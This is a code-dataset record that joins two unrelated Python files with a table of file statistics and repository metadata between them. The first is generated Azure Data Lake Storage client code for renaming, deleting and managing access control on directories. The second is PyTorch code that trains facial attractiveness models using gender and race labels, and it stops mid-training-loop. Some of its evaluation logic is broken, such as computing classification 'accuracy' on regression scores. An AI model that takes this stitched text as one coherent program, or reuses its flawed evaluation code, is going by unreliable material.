:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~.models.LeaseAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~.models.ModifiedAccessConditions
:param source_modified_access_conditions: Additional parameters for
the operation
:type source_modified_access_conditions:
~.models.SourceModifiedAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
cache_control = None
if directory_http_headers is not None:
cache_control = directory_http_headers.cache_control
content_type = None
if directory_http_headers is not None:
content_type = directory_http_headers.content_type
content_encoding = None
if directory_http_headers is not None:
content_encoding = directory_http_headers.content_encoding
content_language = None
if directory_http_headers is not None:
content_language = directory_http_headers.content_language
content_disposition = None
if directory_http_headers is not None:
content_disposition = directory_http_headers.content_disposition
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
source_if_modified_since = None
if source_modified_access_conditions is not None:
source_if_modified_since = source_modified_access_conditions.source_if_modified_since
source_if_unmodified_since = None
if source_modified_access_conditions is not None:
source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
source_if_match = None
if source_modified_access_conditions is not None:
source_if_match = source_modified_access_conditions.source_if_match
source_if_none_match = None
if source_modified_access_conditions is not None:
source_if_none_match = source_modified_access_conditions.source_if_none_match
# Construct URL
url = self.rename.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if marker is not None:
query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')
if path_rename_mode is not None:
query_parameters['mode'] = self._serialize.query("path_rename_mode", path_rename_mode, 'PathRenameMode')
# Construct headers
header_parameters = {}
header_parameters['x-ms-rename-source'] = self._serialize.header("rename_source", rename_source, 'str')
if directory_properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_umask is not None:
header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
if source_lease_id is not None:
header_parameters['x-ms-source-lease-id'] = self._serialize.header("source_lease_id", source_lease_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", cache_control, 'str')
if content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", content_type, 'str')
if content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", content_encoding, 'str')
if content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", content_language, 'str')
if content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", content_disposition, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
if source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
if source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
if source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
if source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.DataLakeStorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'x-ms-continuation': self._deserialize('str', response.headers.get('x-ms-continuation')),
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'Content-Length': self._deserialize('long', response.headers.get('Content-Length')),
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
}
return cls(response, None, response_headers)
rename.metadata = {'url': '/{filesystem}/{path}'}
async def delete(self, recursive_directory_delete, timeout=None, marker=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
"""Deletes the directory.
:param recursive_directory_delete: If "true", all paths beneath the
directory will be deleted. If "false" and the directory is non-empty,
an error occurs.
:type recursive_directory_delete: bool
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param marker: When renaming a directory, the number of paths that are
renamed with each invocation is limited. If the number of paths to be
renamed exceeds this limit, a continuation token is returned in this
response header. When a continuation token is returned in the
response, it must be specified in a subsequent invocation of the
rename operation to continue renaming the directory.
:type marker: str
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~.models.LeaseAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~.models.ModifiedAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
query_parameters['recursive'] = self._serialize.query("recursive_directory_delete", recursive_directory_delete, 'bool')
if marker is not None:
query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')
# Construct headers
header_parameters = {}
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.DataLakeStorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'x-ms-continuation': self._deserialize('str', response.headers.get('x-ms-continuation')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
}
return cls(response, None, response_headers)
delete.metadata = {'url': '/{filesystem}/{path}'}
async def set_access_control(self, timeout=None, owner=None, group=None, posix_permissions=None, posix_acl=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
"""Set the owner, group, permissions, or access control list for a
directory.
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param owner: Optional. The owner of the blob or directory.
:type owner: str
:param group: Optional. The owning group of the blob or directory.
:type group: str
:param posix_permissions: Optional and only valid if Hierarchical
Namespace is enabled for the account. Sets POSIX access permissions
for the file owner, the file owning group, and others. Each class may
be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g.
0766) are supported.
:type posix_permissions: str
:param posix_acl: Sets POSIX access control rights on files and
directories. The value is a comma-separated list of access control
entries. Each access control entry (ACE) consists of a scope, a type,
a user or group identifier, and permissions in the format
"[scope:][type]:[id]:[permissions]".
:type posix_acl: str
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~.models.LeaseAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~.models.ModifiedAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
action = "setAccessControl"
# Construct URL
url = self.set_access_control.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
query_parameters['action'] = self._serialize.query("action", action, 'str')
# Construct headers
header_parameters = {}
if owner is not None:
header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
if group is not None:
header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_acl is not None:
header_parameters['x-ms-acl'] = self._serialize.header("posix_acl", posix_acl, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.DataLakeStorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
}
return cls(response, None, response_headers)
set_access_control.metadata = {'url': '/{filesystem}/{path}'}
async def get_access_control(self, timeout=None, upn=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
"""Get the owner, group, permissions, or access control list for a
directory.
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param upn: Optional. Valid only when Hierarchical Namespace is
enabled for the account. If "true", the identity values returned in
the x-ms-owner, x-ms-group, and x-ms-acl response headers will be
transformed from Azure Active Directory Object IDs to User Principal
Names. If "false", the values will be returned as Azure Active
Directory Object IDs. The default value is false.
:type upn: bool
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~.models.LeaseAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~.models.ModifiedAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
action = "getAccessControl"
# Construct URL
url = self.get_access_control.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if upn is not None:
query_parameters['upn'] = self._serialize.query("upn", upn, 'bool')
query_parameters['action'] = self._serialize.query("action", action, 'str')
# Construct headers
header_parameters = {}
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.DataLakeStorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-owner': self._deserialize('str', response.headers.get('x-ms-owner')),
'x-ms-group': self._deserialize('str', response.headers.get('x-ms-group')),
'x-ms-permissions': self._deserialize('str', response.headers.get('x-ms-permissions')),
'x-ms-acl': self._deserialize('str', response.headers.get('x-ms-acl')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
}
return cls(response, None, response_headers)
get_access_control.metadata = {'url': '/{filesystem}/{path}'}
| 57.328378
| 355
| 0.680221
| 5,230
| 42,423
| 5.307648
| 0.065966
| 0.018553
| 0.033395
| 0.02972
| 0.898339
| 0.88519
| 0.8639
| 0.850571
| 0.840736
| 0.837206
| 0
| 0.004726
| 0.226976
| 42,423
| 739
| 356
| 57.405954
| 0.841739
| 0.029772
| 0
| 0.813896
| 0
| 0
| 0.137075
| 0.022901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002481
| false
| 0
| 0.004963
| 0
| 0.024814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a84fb0228e13b6f0335f40ddbed3a1f98034221
| 22,791
|
py
|
Python
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 11
|
2019-10-28T07:47:03.000Z
|
2021-11-18T08:22:34.000Z
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 1
|
2020-06-29T20:07:28.000Z
|
2020-06-29T21:18:29.000Z
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 3
|
2021-08-28T00:17:17.000Z
|
2021-12-22T12:56:08.000Z
|
import copy
import time
import sys
import os
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim import lr_scheduler
from torchvision import transforms, datasets
from sklearn.metrics import mean_absolute_error, mean_squared_error
sys.path.append('../')
from models.vggm import VggM
from util import file_utils
from models.losses import HMTLoss
from models.hmtnet_fbp import RNet, GNet, HMTNet
from data.datasets import FaceGenderDataset, FaceRaceDataset, FaceDataset, FDataset
from config.cfg import cfg
from data import data_loader
def train_gnet(model, train_loader, test_loader, criterion, optimizer, num_epochs=200, inference=False):
"""
train GNet
:param model:
:param train_loader:
:param test_loader:
:param criterion:
:param optimizer:
:param num_epochs:
:return:
"""
exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print("We are running on", torch.cuda.device_count(), "GPUs!")
model = nn.DataParallel(model)
if not inference:
exp_lr_scheduler.step()
model.train()
for epoch in range(num_epochs): # loop over the dataset multiple times
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
# inputs, labels = data
inputs, labels = data['image'], data['gender']
model = model.to(device)
inputs, labels = inputs.to(device), labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = model.forward(inputs)
outputs = outputs.view(cfg['batch_size'], -1)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
if i % 50 == 49: # print every 50 mini-batches
print('[%d, %5d] loss: %.5f' %
(epoch + 1, i + 1, running_loss / 50))
running_loss = 0.0
print('Finished Training')
print('Save trained model...')
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(model.state_dict(), os.path.join(model_path_dir, 'gnet.pth'))
else:
print('Loading pre-trained model...')
model.load_state_dict(torch.load(os.path.join('./model/gnet.pth')))
model.eval()
correct = 0
total = 0
for data in test_loader:
# images, labels = data
images, labels = data['image'], data['gender']
model = model.to(device)
labels = labels.to(device)
outputs = model.forward(images.to(device))
outputs = outputs.view(cfg['batch_size'], 2)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('correct = %d ...' % correct)
print('total = %d ...' % total)
print('Accuracy of the network on test images: %f' % (correct / total))
def train_rnet(model, train_loader, test_loader, criterion, optimizer, num_epochs=200, inference=False):
"""
train GNet
:param model:
:param train_loader:
:param test_loader:
:param criterion:
:param optimizer:
:param num_epochs:
:return:
"""
exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print("We are running on", torch.cuda.device_count(), "GPUs!")
model = nn.DataParallel(model)
if not inference:
exp_lr_scheduler.step()
model.train()
for epoch in range(num_epochs): # loop over the dataset multiple times
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
# inputs, labels = data
inputs, labels = data['image'], data['race']
model = model.to(device)
inputs, labels = inputs.to(device), labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = model.forward(inputs)
outputs = outputs.view(cfg['batch_size'], 2)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
if i % 50 == 49: # print every 50 mini-batches
print('[%d, %5d] loss: %.5f' %
(epoch + 1, i + 1, running_loss / 50))
running_loss = 0.0
print('Finished Training')
print('Save trained model...')
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(model.state_dict(), os.path.join(model_path_dir, 'rnet.pth'))
else:
print('Loading pre-trained model...')
model.load_state_dict(torch.load(os.path.join('./model/rnet.pth')))
model.eval()
correct = 0
total = 0
for data in test_loader:
# images, labels = data
images, labels = data['image'], data['race']
model = model.to(device)
labels = labels.to(device)
outputs = model.forward(images.to(device))
outputs = outputs.view(cfg['batch_size'], 2)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('correct = %d ...' % correct)
print('total = %d ...' % total)
print('Accuracy of the RNet on test images: %f' % (correct / total))
def finetune_vgg_m_model(model_ft, train_loader, test_loader, criterion, num_epochs=200, inference=False):
"""
fine-tune VGG M Face Model
:param model_ft:
:param train_loader:
:param test_loader:
:param criterion:
:param num_epochs:
:param inference:
:return:
"""
num_ftrs = model_ft.fc8.in_channels
model_ft.fc8 = nn.Conv2d(num_ftrs, 2, 1)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print("We are running on", torch.cuda.device_count(), "GPUs!")
# dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
model_ft = nn.DataParallel(model_ft)
model_ft = model_ft.to(device)
optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=50, gamma=0.1)
if not inference:
for epoch in range(num_epochs): # loop over the dataset multiple times
exp_lr_scheduler.step()
model_ft.train()
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
# inputs, labels = data
inputs, labels = data['image'], data['attractiveness'].float()
model_ft = model_ft.to(device)
inputs, labels = inputs.to(device), labels.to(device)
# zero the parameter gradients
optimizer_ft.zero_grad()
# forward + backward + optimize
outputs = model_ft.forward(inputs)
outputs = (torch.sum(outputs, dim=1) / 2).view(cfg['batch_size'], 1)
outputs = outputs.view(cfg['batch_size'])
loss = criterion(outputs, labels)
loss.backward()
optimizer_ft.step()
# print statistics
running_loss += loss.item()
if i % 50 == 49: # print every 50 mini-batches
print('[%d, %5d] loss: %.5f' %
(epoch + 1, i + 1, running_loss / 50))
running_loss = 0.0
print('Finished Training')
print('Save trained model...')
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(model_ft.state_dict(), os.path.join(model_path_dir, 'ft_vgg_m.pth'))
else:
print('Loading pre-trained model...')
model_ft.load_state_dict(torch.load(os.path.join('./model/ft_vgg_m.pth')))
model_ft.eval()
correct = 0
total = 0
# for data in test_loader:
for i, data in enumerate(test_loader, 0):
# images, labels = data
images, labels = data['image'], data['attractiveness'].float()
model_ft = model_ft.to(device)
labels = labels.to(device)
outputs = model_ft.forward(images.to(device))
outputs = outputs.view(cfg['batch_size'])
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('correct = %d ...' % correct)
print('total = %d ...' % total)
print('Accuracy of the network on the test images: %f' % (correct / total))
def train_anet(model_ft, train_loader, test_loader, criterion, num_epochs=200, inference=False):
"""
train ANet
:param model_ft:
:param train_loader:
:param test_loader:
:param criterion:
:param num_epochs:
:param inference:
:return:
"""
num_ftrs = model_ft.fc8.in_channels
model_ft.fc8 = nn.Conv2d(num_ftrs, 1, 1)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print("We are running on", torch.cuda.device_count(), "GPUs!")
model_ft = nn.DataParallel(model_ft)
model_ft = model_ft.to(device)
optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=50, gamma=0.1)
if not inference:
for epoch in range(num_epochs): # loop over the dataset multiple times
exp_lr_scheduler.step()
model_ft.train()
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
inputs, labels = data['image'], data['attractiveness']
model_ft = model_ft.to(device)
inputs, labels = inputs.to(device), labels.float().to(device)
# zero the parameter gradients
optimizer_ft.zero_grad()
# forward + backward + optimize
outputs = model_ft(inputs)
outputs = outputs.view(cfg['batch_size'])
loss = criterion(outputs, labels)
loss.backward()
optimizer_ft.step()
# print statistics
running_loss += loss.item()
if i % 50 == 49: # print every 50 mini-batches
print('[%d, %5d] loss: %.5f' %
(epoch + 1, i + 1, running_loss / 50))
running_loss = 0.0
print('Finished Training')
print('Save trained model...')
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(model_ft.state_dict(), os.path.join(model_path_dir, 'anet.pth'))
else:
print('Loading pre-trained model...')
model_ft.load_state_dict(torch.load(os.path.join('./model/anet.pth')))
model_ft.eval()
predicted_labels = []
gt_labels = []
for i, data in enumerate(test_loader, 0):
images, labels = data['image'], data['attractiveness']
model_ft = model_ft.to(device)
labels = labels.to(device)
outputs = model_ft.forward(images.to(device))
predicted_labels += outputs.to("cpu").data.numpy().tolist()
gt_labels += labels.to("cpu").numpy().tolist()
from sklearn.metrics import mean_absolute_error, mean_squared_error
mae_lr = round(mean_absolute_error(np.array(gt_labels), np.array(predicted_labels).ravel()), 4)
rmse_lr = round(np.math.sqrt(mean_squared_error(np.array(gt_labels), np.array(predicted_labels).ravel())), 4)
pc = round(np.corrcoef(np.array(gt_labels), np.array(predicted_labels).ravel())[0, 1], 4)
print('===============The Mean Absolute Error of ANet is {0}===================='.format(mae_lr))
print('===============The Root Mean Square Error of ANet is {0}===================='.format(rmse_lr))
print('===============The Pearson Correlation of ANet is {0}===================='.format(pc))
def train_hmtnet(hmt_net, train_loader, test_loader, num_epochs, inference=False):
"""
train HMT-Net
:param hmt_net:
:param train_loader:
:param test_loader:
:param num_epochs:
:param inference:
:return:
"""
print(hmt_net)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print("We are running on", torch.cuda.device_count(), "GPUs!")
hmt_net = nn.DataParallel(hmt_net)
hmt_net = hmt_net.to(device)
criterion = HMTLoss()
optimizer = optim.SGD(hmt_net.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-2)
exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
if not inference:
hmt_net.train()
for epoch in range(num_epochs): # loop over the dataset multiple times
exp_lr_scheduler.step()
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
inputs, gender, race, attractiveness = data['image'], data['gender'], data['race'], \
data['attractiveness']
inputs, gender, race, attractiveness = inputs.to(device), gender.to(device), race.to(
device), attractiveness.float().to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
g_pred, r_pred, a_pred = hmt_net.forward(inputs)
g_pred = g_pred.view(cfg['batch_size'], -1)
r_pred = r_pred.view(cfg['batch_size'], -1)
a_pred = a_pred.view(cfg['batch_size'])
loss = criterion(g_pred, gender, r_pred, race, a_pred, attractiveness)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
